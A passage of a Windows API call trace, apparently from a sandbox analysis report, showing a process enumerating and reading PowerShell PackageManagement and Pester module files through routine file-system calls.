files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0171.186] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0171.186] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0171.187] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0171.187] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0171.187] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0xb156f8c370, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0171.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0171.187] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c8a0 | out: lpFileInformation=0xb156f8c8a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0171.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0171.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0171.187] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0xb156f8c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0171.187] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0xb156f8c520 | out: lpFindFileData=0xb156f8c520*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146a880 [0171.187] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.188] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0171.188] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0171.188] FindClose (in: hFindFile=0x1e35146a880 | out: hFindFile=0x1e35146a880) returned 1 [0171.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0171.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0171.188] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0171.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c830) returned 1 [0171.188] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c910 | out: lpFileInformation=0xb156f8c910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1 [0171.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c7f0) returned 1 [0171.188] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0171.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c5d0) returned 1 [0171.189] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x9bc [0171.189] GetFileType (hFile=0x9bc) returned 0x1 [0171.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c540) returned 1 [0171.189] GetFileType (hFile=0x9bc) returned 0x1 [0171.189] ReadFile (in: hFile=0x9bc, lpBuffer=0x1e339735190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e339735190*, lpNumberOfBytesRead=0xb156f8c6a8*=0x5f8, lpOverlapped=0x0) returned 1 [0171.189] ReadFile (in: hFile=0x9bc, lpBuffer=0x1e3397346c8, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e3397346c8*, lpNumberOfBytesRead=0xb156f8c6a8*=0x0, lpOverlapped=0x0) returned 1 [0171.189] ReadFile (in: hFile=0x9bc, lpBuffer=0x1e339735190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e339735190*, lpNumberOfBytesRead=0xb156f8c6a8*=0x0, lpOverlapped=0x0) returned 1 [0171.189] CloseHandle (hObject=0x9bc) returned 1 [0171.191] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0171.191] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0171.191] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0171.192] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0171.192] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0171.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.193] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.193] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0171.193] FindClose (in: hFindFile=0x1e35146bde0 | out: hFindFile=0x1e35146bde0) returned 1 [0171.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.194] FindNextFileW (in: hFindFile=0x1e35146b960, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.194] FindNextFileW (in: hFindFile=0x1e35146b960, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0171.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0171.194] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.195] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0171.195] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0171.195] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0171.195] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0171.195] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0171.195] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0171.196] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0171.196] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0171.196] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0171.196] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0171.196] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0171.197] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0171.197] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0171.197] FindNextFileW (in: hFindFile=0x1e35146b420, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0171.197] FindClose (in: hFindFile=0x1e35146b420 | out: hFindFile=0x1e35146b420) returned 1 [0171.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0171.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0171.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0171.197] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.198] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0171.198] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0171.198] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0171.198] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0171.198] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0171.198] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0171.199] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0171.199] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0171.199] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, 